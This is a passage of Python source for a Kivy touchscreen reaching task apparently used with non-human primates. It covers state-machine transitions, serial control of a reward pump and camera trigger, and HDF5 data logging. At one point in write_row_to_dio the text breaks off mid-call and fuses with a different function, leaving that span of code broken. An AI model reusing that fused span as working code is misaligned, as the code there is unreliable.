dict(finish_targ_hold='set_error', early_leave_target1_hold = 'hold_error_t2p',\r\n targ1_drag_out = 'drag_error_t2p', stop=None, non_rhtouch='RH_touch')\r\n \r\n self.FSM['set_error'] = dict(end_set_error='IHSI', stop=None)\r\n self.FSM['set_complete'] = dict(hyperset_complete = 'reward_hyperset', next_set = 'reward_set', stop=None, 
non_rhtouch='RH_touch')\r\n self.FSM['reward_set'] = dict(end_reward_set = 'set', stop=None, non_rhtouch='RH_touch')\r\n self.FSM['reward_hyperset'] = dict(end_reward_hyperset = 'IHSI', stop=None, non_rhtouch='RH_touch')\r\n \r\n self.FSM['timeout_error'] = dict(end_timeout_error='IHSI', stop=None, non_rhtouch='RH_touch')\r\n self.FSM['hold_error_nopress'] = dict(end_hold_error_nopress='set', stop=None, non_rhtouch='RH_touch')\r\n self.FSM['drag_error_nopress'] = dict(end_drag_error_nopress='set', stop=None, non_rhtouch='RH_touch')\r\n \r\n self.FSM['hold_error_t1p'] = dict(end_hold_error_t1p='targ1_pressed', stop=None, non_rhtouch='RH_touch')\r\n self.FSM['drag_error_t1p'] = dict(end_drag_error_t1p='targ1_pressed', stop=None, non_rhtouch='RH_touch')\r\n \r\n self.FSM['hold_error_t2p'] = dict(end_hold_error_t2p='targ2_pressed', stop=None, non_rhtouch='RH_touch')\r\n self.FSM['drag_error_t2p'] = dict(end_drag_error_t2p='targ2_pressed', stop=None, non_rhtouch='RH_touch')\r\n \r\n # self.FSM['rew_anytouch'] = dict(end_rewanytouch='target', stop=None, non_rhtouch='RH_touch')\r\n self.FSM['idle_exit'] = dict(stop=None)\r\n \r\n \r\n # Test the COM ports for the reward and camera\r\n try:\r\n self.reward_port = serial.Serial(port='COM4',\r\n baudrate=115200)\r\n self.reward_port.close()\r\n except:\r\n pass\r\n\r\n try:\r\n self.dio_port = serial.Serial(port='COM5', baudrate=115200)\r\n time.sleep(4.)\r\n except:\r\n pass\r\n\r\n try:\r\n self.cam_trig_port = serial.Serial(port='COM6', baudrate=9600)\r\n time.sleep(3.)\r\n # Say hello: \r\n self.cam_trig_port.write('a'.encode())\r\n\r\n # Start cams @ 50 Hz\r\n self.cam_trig_port.write('1'.encode())\r\n except:\r\n pass\r\n\r\n # save parameters: \r\n d = dict(animal_name=animal_name, target_rad=self.target_rad,\r\n sets_selected = self.sets_selected, \r\n ISetI_mean=self.ISetI_mean, ISetI_std = self.ISetI_std, \r\n IHSI_mean=self.IHSI_mean, IHSI_std = self.IHSI_std, \r\n targ_hold_time = self.tht,\r\n ch_timeout=self.ch_timeout, \r\n anytarg_rew_time=self.anytarg_rew,\r\n set_rew_time = self.set_rew,\r\n hs_rew_time=self.hs_rew,\r\n timeout_error_timeout = self.timeout_error_timeout,\r\n hold_error_timeout = self.hold_error_timeout,\r\n drag_error_timeout = self.drag_error_timeout,\r\n start_time = datetime.datetime.now().strftime('%Y%m%d_%H%M'),\r\n testing=self.testing,\r\n rew_delay = self.reward_delay_time,\r\n use_cap_sensor = self.use_cap_sensor,\r\n drag_ok = self.drag_ok,\r\n )\r\n\r\n print(self.anytarg_rew)\r\n print(self.set_rew)\r\n print(self.hs_rew)\r\n\r\n try:\r\n if self.testing:\r\n pass\r\n\r\n else:\r\n import os\r\n path = os.getcwd()\r\n path = path.split('\\\\')\r\n path_data = [p for p in path if np.logical_and('Touchscreen' not in p, 'Targ' not in p)]\r\n path_root = ''\r\n for ip in path_data:\r\n path_root += ip+'/'\r\n p = path_root + 'data/'\r\n\r\n # Check if this directory exists: \r\n if os.path.exists(p):\r\n pass\r\n else:\r\n p = path_root+ 'data_tmp_'+datetime.datetime.now().strftime('%Y%m%d')+'/'\r\n if os.path.exists(p):\r\n pass\r\n else:\r\n os.mkdir(p)\r\n print('Making temp directory: ', p)\r\n\r\n print ('')\r\n print ('')\r\n print('Data saving PATH: ', p)\r\n print ('')\r\n print ('')\r\n self.filename = p+ animal_name+'_'+datetime.datetime.now().strftime('%Y%m%d_%H%M')\r\n if self.in_cage:\r\n self.filename = self.filename+'_cage'\r\n\r\n pickle.dump(d, open(self.filename+'_params.pkl', 'wb'))\r\n self.h5file = tables.open_file(self.filename + '_data.hdf', mode='w', title = 'NHP data')\r\n 
self.h5_table = self.h5file.create_table('/', 'task', Data, '')\r\n self.h5_table_row = self.h5_table.row\r\n self.h5_table_row_cnt = 0\r\n\r\n # Note in python 3 to open pkl files: \r\n #with open('xxxx_params.pkl', 'rb') as f:\r\n # data_params = pickle.load(f)\r\n except:\r\n pass\r\n \r\n # Function for Closing the App\r\n def close_app(self):\r\n # Save Data Eventually\r\n #Stop the video: \r\n try:\r\n self.cam_trig_port.write('0'.encode())\r\n except:\r\n pass\r\n\r\n if self.use_cap_sensor:\r\n self.serial_port_cap.close()\r\n \r\n if self.idle:\r\n self.state = 'idle_exit'\r\n self.trial_counter = -1\r\n\r\n # Set relevant params text: \r\n self.cht_text = 'Home Hold Time: '\r\n self.tht_text = 'Target Hold Time: '\r\n self.targ_size_text = 'Target Radius: '\r\n self.big_rew_text = 'Big Reward Time: '\r\n\r\n if type(self.cht_type) is str:\r\n self.cht_param = self.cht_type\r\n else:\r\n self.cht_param = 'Constant: ' + str(self.cht)\r\n\r\n if type(self.tht_type) is str:\r\n self.tht_param = self.tht_type\r\n else:\r\n self.tht_param = 'Constant: ' + str(self.tht)\r\n\r\n self.targ_size_param = str(self.target_rad)\r\n self.big_rew_time_param = str(self.reward_for_targtouch[1])\r\n\r\n else:\r\n App.get_running_app().stop()\r\n Window.close()\r\n \r\n def update(self, ts):\r\n self.state_length = time.time() - self.state_start\r\n self.rew_cnt += 1\r\n # self.set_rew_cnt += 1\r\n \r\n # Run task update functions: \r\n for f, (fcn_test_name, next_state) in enumerate(self.FSM[self.state].items()):\r\n kw = dict(ts=self.state_length)\r\n\r\n fcn_test = getattr(self, fcn_test_name)\r\n if fcn_test(**kw):\r\n # if stop: close the app\r\n if fcn_test_name == 'stop':\r\n self.close_app()\r\n\r\n else:\r\n # Run any 'end' fcns from prevoius state: \r\n end_state_fn_name = \"_end_%s\" % self.state\r\n if hasattr(self, end_state_fn_name):\r\n end_state_fn = getattr(self, end_state_fn_name)\r\n end_state_fn()\r\n \r\n # Advance to the next state\r\n self.prev_state = self.state_length\r\n # if next_state is 'set_error':\r\n # import pdb; pdb.set_trace()\r\n self.state = next_state\r\n \r\n self.state_start = time.time()\r\n\r\n # Run any starting functions: \r\n start_state_fn_name = \"_start_%s\" % self.state\r\n if hasattr(self, start_state_fn_name):\r\n start_state_fn = getattr(self, start_state_fn_name)\r\n start_state_fn()\r\n else:\r\n while_state_fn_name = \"_while_%s\" % self.state\r\n if hasattr(self, while_state_fn_name):\r\n while_state_fn = getattr(self, while_state_fn_name)\r\n while_state_fn()\r\n \r\n if self.use_cap_sensor:\r\n try:\r\n self.serial_port_cap.flushInput()\r\n port_read = self.serial_port_cap.read(4)\r\n if str(port_read[:2]) == \"b'N1'\":\r\n self.rhtouch_sensor = False\r\n elif str(port_read[:2]) == \"b'C1'\":\r\n self.rhtouch_sensor = True\r\n print(self.rhtouch_sensor)\r\n except:\r\n print('passing state! 
')\r\n pass \r\n \r\n # Save the data if this is not a test or we arent exiting\r\n if self.testing:\r\n pass\r\n else:\r\n if self.state == 'idle_exit':\r\n pass\r\n else:\r\n self.write_to_h5file()\r\n \r\n # Function for saving the data\r\n def write_to_h5file(self):\r\n self.h5_table_row['state']= self.state; \r\n cursor = np.zeros((10, 2))\r\n cursor[:] = np.nan\r\n for ic, curs_id in enumerate(self.cursor_ids):\r\n cursor[ic, :] = self.cursor[curs_id]\r\n\r\n self.h5_table_row['cursor'] = cursor\r\n\r\n cursor_id = np.zeros((10, ))\r\n cursor_id[:] = np.nan\r\n cursor_id[:len(self.cursor_ids)] = self.cursor_ids\r\n self.h5_table_row['cursor_ids'] = cursor_id\r\n\r\n self.h5_table_row['set_ix'] = self.set_ix\r\n self.h5_table_row['time'] = time.time() - self.t0\r\n self.h5_table_row['cap_touch'] = self.rhtouch_sensor\r\n self.h5_table_row.append()\r\n\r\n # Write DIO \r\n try:\r\n self.write_row_to_dio()\r\n except:\r\n pass\r\n \r\n # Upgrade table row: \r\n self.h5_table_row_cnt += 1\r\n \r\n def write_row_to_dio(self):\r\n ### FROM TDT TABLE, 5 is GND, BYTE A ###\r\n row_to_write = self.h5_table_row_cnt % 256\r\n\r\n ### write to arduino: \r\n word_str = b'd' + struct.pack('= self.max_trials, self.state == 'IHSI'):\r\n self.idle = True\r\n return True\r\n else:\r\n # Stop if both exit targets are held\r\n e = [0, 0]\r\n e[0] = self.check_if_cursors_in_targ(self.exit_pos1, self.exit_rad)\r\n e[1] = self.check_if_cursors_in_targ(self.exit_pos2, self.exit_rad)\r\n t = [0, 0]\r\n for i in range(2):\r\n if np.logical_and(self.prev_exit_ts[i] !=0, e[i] == True):\r\n t[i] = time.time() - self.prev_exit_ts[i]\r\n elif np.logical_and(self.prev_exit_ts[i] == 0, e[i]==True):\r\n self.prev_exit_ts[i] = time.time()\r\n else:\r\n self.prev_exit_ts[i] = 0\r\n \r\n if t[0] > self.exit_hold and t[1] > self.exit_hold:\r\n self.idle = False\r\n return True\r\n\r\n else:\r\n return False\r\n \r\n # IHSI State\r\n def _start_IHSI(self, **kwargs):\r\n try:\r\n self.cam_trig_port.write('0'.encode())\r\n except:\r\n pass\r\n \r\n # Make the screen dark\r\n Window.clearcolor = (0., 0., 0., 1.)\r\n self.change_allbutton_color(0, 0, 0, 1)\r\n self.exit_target1.color = (.15, .15, .15, 1.)\r\n self.exit_target2.color = (.15, .15, .15, 1.)\r\n \r\n # Set the set index to 1\r\n self.set_ix = 1;\r\n \r\n # Set IHSI, CHT, THT\r\n self.IHSI = np.random.random()*self.IHSI_std + self.IHSI_mean\r\n\r\n if type(self.cht_type) is str:\r\n cht_min, cht_max = self.cht_type.split('-')\r\n self.cht = ((float(cht_max) - float(cht_min)) * np.random.random()) + float(cht_min)\r\n\r\n if type(self.tht_type) is str:\r\n tht_min, tht_max = self.tht_type.split('-')\r\n self.tht = ((float(tht_max) - float(tht_min)) * np.random.random()) + float(tht_min) \r\n \r\n # Make all of the targets invisible\r\n self.target1.color = (0., 0., 0., 0.)\r\n self.target2.color = (0., 0., 0., 0.)\r\n # self.indicator_targ.color = (0., 0., 0., 0.)\r\n \r\n def end_IHSI(self, **kwargs):\r\n return kwargs['ts'] > self.IHSI\r\n \r\n # Video Trigger State\r\n def _start_vid_trig(self, **kwargs):\r\n if self.trial_counter == 0:\r\n time.sleep(1.)\r\n try: \r\n self.cam_trig_port.write('1'.encode())\r\n except:\r\n pass\r\n \r\n # Sets that come after the trigger must be the first set\r\n self.first_set_attempt = True\r\n\r\n if np.logical_and(self.use_cap_sensor, not self.rhtouch_sensor):\r\n self.target1.color = (1., 0., 0., 1.)\r\n self.target2.color = (1., 0., 0., 1.)\r\n Window.clearcolor = (1., 0., 0., 1.)\r\n\r\n # # Turn exit buttons redish:\r\n 
self.exit_target1.color = (.9, 0, 0, 1.)\r\n self.exit_target2.color = (.9, 0, 0, 1.)\r\n\r\n def end_vid_trig(self, **kwargs):\r\n return kwargs['ts'] > self.pre_start_vid_ts\r\n \r\n # Right hand on touch sensor\r\n def rhtouch(self, **kwargs):\r\n if self.use_cap_sensor:\r\n if self.rhtouch_sensor:\r\n return True\r\n else:\r\n return False\r\n else:\r\n return True\r\n\r\n def non_rhtouch(self, **kwargs):\r\n x = not self.rhtouch()\r\n # if x:\r\n # self.repeat = True\r\n return x\r\n \r\n # Start a new set\r\n def _start_set(self, **kwargs):\r\n self.touch = False ## We need to start with this being false or else if non-target touch tolerance is not infinity, the previous touch will carry over and cause an error\r\n Window.clearcolor = (0., 0., 0., 1.)\r\n \r\n # Display outlines of all of the buttons\r\n self.button1_out.move(np.array([self.possible_target_pos_x[0], self.possible_target_pos_y[0]]))\r\n self.button1_out.color = (1., 1., 0., 1.)\r\n self.button1_in.move(np.array([self.possible_target_pos_x[0], self.possible_target_pos_y[0]]))\r\n self.button1_in.color = (0., 0., 0., 1.)\r\n self.button2_out.move(np.array([self.possible_target_pos_x[1], self.possible_target_pos_y[1]]))\r\n self.button2_out.color = (1., 1., 0., 1.)\r\n self.button2_in.move(np.array([self.possible_target_pos_x[1], self.possible_target_pos_y[1]]))\r\n self.button2_in.color = (0., 0., 0., 1.)\r\n self.button3_out.move(np.array([self.possible_target_pos_x[2], self.possible_target_pos_y[2]]))\r\n self.button3_out.color = (1., 1., 0., 1.)\r\n self.button3_in.move(np.array([self.possible_target_pos_x[2], self.possible_target_pos_y[2]]))\r\n self.button3_in.color = (0., 0., 0., 1.)\r\n self.button4_out.move(np.array([self.possible_target_pos_x[3], self.possible_target_pos_y[3]]))\r\n self.button4_out.color = (1., 1., 0., 1.)\r\n self.button4_in.move(np.array([self.possible_target_pos_x[3], self.possible_target_pos_y[3]]))\r\n self.button4_in.color = (0., 0., 0., 1.)\r\n self.button5_out.move(np.array([self.possible_target_pos_x[4], self.possible_target_pos_y[4]]))\r\n self.button5_out.color = (1., 1., 0., 1.)\r\n self.button5_in.move(np.array([self.possible_target_pos_x[4], self.possible_target_pos_y[4]]))\r\n self.button5_in.color = (0., 0., 0., 1.)\r\n self.button6_out.move(np.array([self.possible_target_pos_x[5], self.possible_target_pos_y[5]]))\r\n self.button6_out.color = (1., 1., 0., 1.)\r\n self.button6_in.move(np.array([self.possible_target_pos_x[5], self.possible_target_pos_y[5]]))\r\n self.button6_in.color = (0., 0., 0., 1.)\r\n self.button7_out.move(np.array([self.possible_target_pos_x[6], self.possible_target_pos_y[6]]))\r\n self.button7_out.color = (1., 1., 0., 1.)\r\n self.button7_in.move(np.array([self.possible_target_pos_x[6], self.possible_target_pos_y[6]]))\r\n self.button7_in.color = (0., 0., 0., 1.)\r\n self.button8_out.move(np.array([self.possible_target_pos_x[7], self.possible_target_pos_y[7]]))\r\n self.button8_out.color = (1., 1., 0., 1.)\r\n self.button8_in.move(np.array([self.possible_target_pos_x[7], self.possible_target_pos_y[7]]))\r\n self.button8_in.color = (0., 0., 0., 1.)\r\n self.button9_out.move(np.array([self.possible_target_pos_x[8], self.possible_target_pos_y[8]]))\r\n self.button9_out.color = (1., 1., 0., 1.)\r\n self.button9_in.move(np.array([self.possible_target_pos_x[8], self.possible_target_pos_y[8]]))\r\n self.button9_in.color = (0., 0., 0., 1.)\r\n self.button10_out.move(np.array([self.possible_target_pos_x[9], self.possible_target_pos_y[9]]))\r\n 
self.button10_out.color = (1., 1., 0., 1.)\r\n self.button10_in.move(np.array([self.possible_target_pos_x[9], self.possible_target_pos_y[9]]))\r\n self.button10_in.color = (0., 0., 0., 1.)\r\n self.button11_out.move(np.array([self.possible_target_pos_x[10], self.possible_target_pos_y[10]]))\r\n self.button11_out.color = (1., 1., 0., 1.)\r\n self.button11_in.move(np.array([self.possible_target_pos_x[10], self.possible_target_pos_y[10]]))\r\n self.button11_in.color = (0., 0., 0., 1.)\r\n self.button12_out.move(np.array([self.possible_target_pos_x[11], self.possible_target_pos_y[11]]))\r\n self.button12_out.color = (1., 1., 0., 1.)\r\n self.button12_in.move(np.array([self.possible_target_pos_x[11], self.possible_target_pos_y[11]]))\r\n self.button12_in.color = (0., 0., 0., 1.)\r\n self.button13_out.move(np.array([self.possible_target_pos_x[12], self.possible_target_pos_y[12]]))\r\n self.button13_out.color = (1., 1., 0., 1.)\r\n self.button13_in.move(np.array([self.possible_target_pos_x[12], self.possible_target_pos_y[12]]))\r\n self.button13_in.color = (0., 0., 0., 1.)\r\n self.button14_out.move(np.array([self.possible_target_pos_x[13], self.possible_target_pos_y[13]]))\r\n self.button14_out.color = (1., 1., 0., 1.)\r\n self.button14_in.move(np.array([self.possible_target_pos_x[13], self.possible_target_pos_y[13]]))\r\n self.button14_in.color = (0., 0., 0., 1.)\r\n self.button15_out.move(np.array([self.possible_target_pos_x[14], self.possible_target_pos_y[14]]))\r\n self.button15_out.color = (1., 1., 0., 1.)\r\n self.button15_in.move(np.array([self.possible_target_pos_x[14], self.possible_target_pos_y[14]]))\r\n self.button15_in.color = (0., 0., 0., 1.)\r\n self.button16_out.move(np.array([self.possible_target_pos_x[15], self.possible_target_pos_y[15]]))\r\n self.button16_out.color = (1., 1., 0., 1.)\r\n self.button16_in.move(np.array([self.possible_target_pos_x[15], self.possible_target_pos_y[15]]))\r\n self.button16_in.color = (0., 0., 0., 1.)\r\n \r\n # Update the progress bar\r\n self.percent_done = 100*(self.set_ix/self.nsets_per_hyperset)\r\n \r\n # Determine which targets to show for this set\r\n self.target_index = np.array([2*(self.sets_selected[self.set_ix-1]), 2*(self.sets_selected[self.set_ix-1])+1])\r\n \r\n self.targtouch_rew_given = False\r\n \r\n # Change the position of the targets\r\n if self.repeat is False:\r\n self.target1_position = np.array([self.possible_target_pos_x[self.target_list[self.target_HS_index, self.target_index[0]]], self.possible_target_pos_y[self.target_list[self.target_HS_index, self.target_index[0]]]])\r\n self.target2_position = np.array([self.possible_target_pos_x[self.target_list[self.target_HS_index, self.target_index[1]]], self.possible_target_pos_y[self.target_list[self.target_HS_index, self.target_index[1]]]])\r\n \r\n # self.target_set_index += 2\r\n print(self.target1_position)\r\n print(self.target2_position)\r\n \r\n self.target1.move(self.target1_position)\r\n self.target2.move(self.target2_position)\r\n self.target1.color = (1., 1., 0., 1.)\r\n self.target2.color = (1., 1., 0., 1.)\r\n self.repeat = False\r\n \r\n # Turn exit buttons gray\r\n self.exit_target1.color = (.15, .15, .15, 1)\r\n self.exit_target2.color = (.15, .15, .15, 1)\r\n # self.indicator_targ.color = (.25, .25, .25, 1.)\r\n \r\n if self.first_set_attempt:\r\n self.first_set_attempt_t0 = time.time();\r\n self.first_set_attempt = False\r\n \r\n # Touch Targets\r\n def touch_target1(self, **kwargs):\r\n if self.drag_ok:\r\n return 
self.check_if_cursors_in_targ(self.target1_position, self.target_rad)\r\n else:\r\n return np.logical_and(self.check_if_cursors_in_targ(self.target1_position, self.target_rad),\r\n self.check_if_started_in_targ(self.target1_position, self.target_rad))\r\n \r\n def touch_target2(self, **kwargs):\r\n if self.drag_ok:\r\n return self.check_if_cursors_in_targ(self.target2_position, self.target_rad)\r\n else:\r\n return np.logical_and(self.check_if_cursors_in_targ(self.target2_position, self.target_rad),\r\n self.check_if_started_in_targ(self.target2_position, self.target_rad))\r\n \r\n def touch_nontarg(self, **kwargs):\r\n nontarg_error = False\r\n if np.logical_and(self.nontarget_error_tolerance < 100, self.touch):\r\n nontarg_error = not np.logical_or(self.check_if_cursors_in_targ(self.target1_position, self.nontarget_error_tolerance*self.target_rad), \r\n self.check_if_cursors_in_targ(self.target2_position, self.nontarget_error_tolerance*self.target_rad))\r\n\r\n return nontarg_error\r\n \r\n # Starting with target 2 gives an error\r\n def t2p_first_error(self, **kwargs):\r\n return self.t2p_first_is_error\r\n \r\n # Start Target Holds --> Change the Color of the target to yellow?\r\n def _start_targ1_hold(self, **kwargs):\r\n self.target1.color = (0., 1., 0., 1.)\r\n # self.indicator_targ.color = (0.75, .75, .75, 1.)\r\n \r\n def _start_targ2_hold(self, **kwargs):\r\n self.target2.color = (0., 1., 0., 1.)\r\n # self.indicator_targ.color = (0.75, .75, .75, 1.)\r\n \r\n def _start_t2p_targ1_hold(self, **kwargs):\r\n self.target1.color = (0., 1., 0., 1.)\r\n # self.indicator_targ.color = (0.75, .75, .75, 1.)\r\n \r\n def _start_t1p_targ2_hold(self, **kwargs):\r\n self.target2.color = (0., 1., 0., 1.)\r\n # self.indicator_targ.color = (0.75, .75, .75, 1.)\r\n \r\n # End Target Holds --> Change the color of the target to same as background\r\n def _end_targ1_hold(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n \r\n def _end_targ2_hold(self, **kwargs):\r\n self.target2.color = (0., 0., 0., 1.)\r\n \r\n # Finish target hold?\r\n def finish_targ_hold(self, **kwargs):\r\n return self.tht <= kwargs['ts']\r\n \r\n # One target has been pressed --> make it invisible\r\n def _start_targ1_pressed(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n self.target2.color = (1., 1., 0., 1.)\r\n # self.indicator_targ.color = (0.75, .75, .75, 1.)\r\n \r\n if self.rew_tone_every:\r\n print('rew every correct')\r\n sound = SoundLoader.load('reward2.wav')\r\n sound.play()\r\n \r\n if self.reward_for_targtouch[0] and not self.targtouch_rew_given:\r\n self.run_anytarg_rew()\r\n self.targtouch_rew_given = True\r\n \r\n def _start_targ2_pressed(self, **kwargs):\r\n self.target1.color = (1., 1., 0., 1.)\r\n self.target2.color = (0., 0., 0., 1.)\r\n # self.indicator_targ.color = (0.75, .75, .75, 1.)\r\n \r\n if self.reward_for_targtouch[0] and not self.targtouch_rew_given:\r\n self.run_anytarg_rew()\r\n self.targtouch_rew_given = True\r\n\r\n \r\n # Once a set is complete, determine whether to restart or move to the next set\r\n def hyperset_complete(self, **kwargs):\r\n return self.set_ix == self.nsets_per_hyperset\r\n \r\n def next_set(self, **kwargs):\r\n return self.set_ix < self.nsets_per_hyperset\r\n \r\n \r\n ################################### REWARD STATES ################################\r\n def _start_reward_set(self, **kwargs):\r\n self.trial_counter += 1\r\n Window.clearcolor = (1., 1., 1., 1.)\r\n self.target1.color = (1., 1., 1., 1.)\r\n self.target2.color = (1., 1., 1., 1.)\r\n 
\r\n # # Turn exit targets white\r\n # self.exit_target1.color = (1., 1., 1., 1.)\r\n # self.exit_target2.color = (1., 1., 1., 1.)\r\n self.rew_cnt = 0\r\n self.cnts_in_rew = 0\r\n # self.indicator_targ.color = (1., 1., 1., 1.)\r\n self.repeat = False\r\n \r\n def _while_reward_set(self, **kwargs):\r\n if self.rew_cnt == 0:\r\n self.run_set_rew()\r\n self.rew_cnt += 1\r\n \r\n def end_reward_set(self, **kwargs):\r\n # Advance to the next set\r\n self.set_ix += 1\r\n \r\n # The next set will be the first attempt of that set\r\n self.first_set_attempt = True\r\n \r\n return True\r\n \r\n def _start_reward_hyperset(self, **kwargs):\r\n self.trial_counter += 1\r\n \r\n # Turn the screen green\r\n Window.clearcolor = (0., 1., 0., 1.)\r\n self.change_allbutton_color(0, 1, 0, 1)\r\n \r\n self.rew_cnt = 0\r\n self.cnts_in_rew = 0\r\n # self.indicator_targ.color = (1., 1., 1., 1.)\r\n self.repeat = False\r\n \r\n def _while_reward_hyperset(self, **kwargs):\r\n if self.rew_cnt == 0:\r\n self.run_HS_rew()\r\n self.rew_cnt += 1\r\n \r\n def end_reward_hyperset(self, **kwargs):\r\n return True\r\n \r\n ################################### ERROR STATES ################################\r\n # Set Error\r\n def _start_set_error(self, **kwargs):\r\n # Play an error tone\r\n if self.anytarg_rew == 0:\r\n sound = SoundLoader.load('error1.wav')\r\n sound.play()\r\n \r\n # Make the screen red\r\n self.percent_done = 0\r\n Window.clearcolor = (1., 0., 0., 1.)\r\n self.change_allbutton_color(1, 0, 0, 1)\r\n \r\n \r\n def end_set_error(self, **kwargs):\r\n # end the set error after the timeout period\r\n return kwargs['ts'] > self.error_timeout_time\r\n \r\n # Early leave from target --> hold error (buttons turn invisible)\r\n def early_leave_target1_hold(self, **kwargs):\r\n return not self.check_if_cursors_in_targ(self.target1_position, self.target_rad)\r\n \r\n def early_leave_target2_hold(self, **kwargs):\r\n return not self.check_if_cursors_in_targ(self.target2_position, self.target_rad)\r\n \r\n def _start_hold_error_nopress(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n self.target2.color = (0., 0., 0., 1.)\r\n self.repeat = True\r\n \r\n def end_hold_error_nopress(self, **kwargs):\r\n return kwargs['ts'] >= self.hold_error_timeout \r\n \r\n def _start_hold_error_t1p(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n self.target2.color = (0., 0., 0., 1.)\r\n self.repeat = True\r\n \r\n def end_hold_error_t1p(self, **kwargs):\r\n return kwargs['ts'] >= self.hold_error_timeout \r\n \r\n def _start_hold_error_t2p(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n self.target2.color = (0., 0., 0., 1.)\r\n self.repeat = True\r\n \r\n def end_hold_error_t2p(self, **kwargs):\r\n return kwargs['ts'] >= self.hold_error_timeout \r\n \r\n \r\n # Drag outside of target --> drag error (buttons turn invisible)\r\n def targ1_drag_out(self, **kwargs):\r\n touch = self.touch\r\n self.touch = True\r\n stay_in = self.check_if_cursors_in_targ(self.target1_position, self.target_rad)\r\n self.touch = touch\r\n return not stay_in\r\n \r\n def targ2_drag_out(self, **kwargs):\r\n touch = self.touch\r\n self.touch = True\r\n stay_in = self.check_if_cursors_in_targ(self.target2_position, self.target_rad)\r\n self.touch = touch\r\n return not stay_in\r\n \r\n def _start_drag_error_nopress(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n self.target2.color = (0., 0., 0., 1.)\r\n self.repeat = True\r\n \r\n def end_drag_error_nopress(self, **kwargs):\r\n return kwargs['ts'] >= 
self.drag_error_timeout\r\n \r\n def _start_drag_error_t1p(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n self.target2.color = (0., 0., 0., 1.)\r\n self.repeat = True\r\n \r\n def end_drag_error_t1p(self, **kwargs):\r\n return kwargs['ts'] >= self.hold_error_timeout \r\n \r\n def _start_drag_error_t2p(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n self.target2.color = (0., 0., 0., 1.)\r\n self.repeat = True\r\n \r\n def end_drag_error_t2p(self, **kwargs):\r\n return kwargs['ts'] >= self.hold_error_timeout \r\n \r\n \r\n # Timeout error\r\n def set_timeout(self, **kwargs):\r\n #return kwargs['ts'] > self.target_timeout_time\r\n if time.time() - self.first_set_attempt_t0 > self.set_timeout_time:\r\n self.repeat = False\r\n return True\r\n \r\n def _start_timeout_error(self, **kwargs):\r\n self.target1.color = (0., 0., 0., 1.)\r\n self.target2.color = (0., 0., 0., 1.)\r\n #self.repeat = True\r\n \r\n def end_timeout_error(self, **kwargs):\r\n return kwargs['ts'] >= self.timeout_error_timeout\r\n \r\n # Check if the cursor is in the target and started in the target\r\n def check_if_started_in_targ(self, targ_center, targ_rad):\r\n startedInTarg = False\r\n if self.touch:\r\n for id_ in self.cursor_ids:\r\n # If in target: \r\n if np.linalg.norm(np.array(self.cursor[id_]) - targ_center) < targ_rad:\r\n if np.linalg.norm(np.array(self.cursor_start[id_]) - targ_center) < targ_rad:\r\n startedInTarg = True\r\n return startedInTarg\r\n\r\n def check_if_cursors_in_targ(self, targ_center, targ_rad):\r\n if self.touch:\r\n inTarg = False\r\n for id_ in self.cursor_ids:\r\n if np.linalg.norm(np.array(self.cursor[id_]) - targ_center) < targ_rad:\r\n inTarg = True\r\n\r\n return inTarg\r\n else:\r\n return False\r\n \r\n \r\n # Generate reward schedule\r\n def gen_rewards(self, perc_trials_rew, perc_trials_2x, reward_for_grasp):\r\n mini_block = int(2*(np.round(1./self.percent_of_trials_rewarded)))\r\n rew = []\r\n trial_cnt_bonus = 0\r\n\r\n for i in range(500):\r\n mini_block_array = np.zeros((mini_block))\r\n ix = np.random.permutation(mini_block)\r\n mini_block_array[ix[:2]] = reward_for_grasp[1]\r\n\r\n trial_cnt_bonus += mini_block\r\n if perc_trials_2x > 0:\r\n if trial_cnt_bonus > int(1./(perc_trials_rew*perc_trials_2x)):\r\n mini_block_array[ix[0]] = reward_for_grasp[1]*2.\r\n trial_cnt_bonus = 0\r\n\r\n rew.append(mini_block_array)\r\n return np.hstack((rew))\r\n \r\n # Run Rewards\r\n def run_anytarg_rew(self, **kwargs):\r\n print('Run anytarg reward')\r\n try:\r\n ### To trigger reward make sure reward is > 0:\r\n if self.anytarg_rew > 0:\r\n self.reward_port.open()\r\n rew_str = [ord(r) for r in 'inf 50 ml/min '+str(self.anytarg_rew)+' sec\\n']\r\n self.reward_port.write(rew_str)\r\n time.sleep(.25)\r\n run_str = [ord(r) for r in 'run\\n']\r\n self.reward_port.write(run_str)\r\n self.reward_port.close()\r\n except:\r\n pass\r\n\r\n #self.repeat = True\r\n \r\n def run_set_rew(self, **kwargs):\r\n try:\r\n #winsound.PlaySound('beep1.wav', winsound.SND_ASYNC)\r\n sound = SoundLoader.load('reward2.wav')\r\n sound.play()\r\n\r\n ### To trigger reward make sure reward is > 0:\r\n if self.set_rew > 0:\r\n self.reward_port.open()\r\n rew_str = [ord(r) for r in 'inf 50 ml/min '+str(self.set_rew)+' sec\\n']\r\n self.reward_port.write(rew_str)\r\n time.sleep(.25)\r\n run_str = [ord(r) for r in 'run\\n']\r\n self.reward_port.write(run_str)\r\n self.reward_port.close()\r\n except:\r\n pass\r\n\r\n #self.repeat = True\r\n \r\n def run_HS_rew(self, **kwargs):\r\n try:\r\n 
#winsound.PlaySound('beep1.wav', winsound.SND_ASYNC)\r\n sound = SoundLoader.load('reward1.wav')\r\n sound.play()\r\n \r\n print('in big reward:')\r\n self.repeat = False\r\n #winsound.PlaySound('beep1.wav', winsound.SND_ASYNC)\r\n #sound = SoundLoader.load('reward1.wav')\r\n #print(str(self.reward_generator[self.trial_counter]))\r\n #print(self.trial_counter)\r\n #print(self.reward_generator[:100])\r\n # self.reward1.play()\r\n\r\n # if not self.skip_juice:\r\n # if self.reward_generator[self.trial_counter] > 0:\r\n self.reward_port.open()\r\n #rew_str = [ord(r) for r in 'inf 50 ml/min '+str(self.reward_for_targtouch[1])+' sec\\n']\r\n rew_str = [ord(r) for r in 'inf 50 ml/min '+str(self.hs_rew)+' sec\\n']\r\n self.reward_port.write(rew_str)\r\n time.sleep(.25 + self.reward_delay_time)\r\n run_str = [ord(r) for r in 'run\\n']\r\n self.reward_port.write(run_str)\r\n self.reward_port.close()\r\n except:\r\n pass\r\n \r\n # Other utilities\r\n def change_allbutton_color(self, r, g, b, 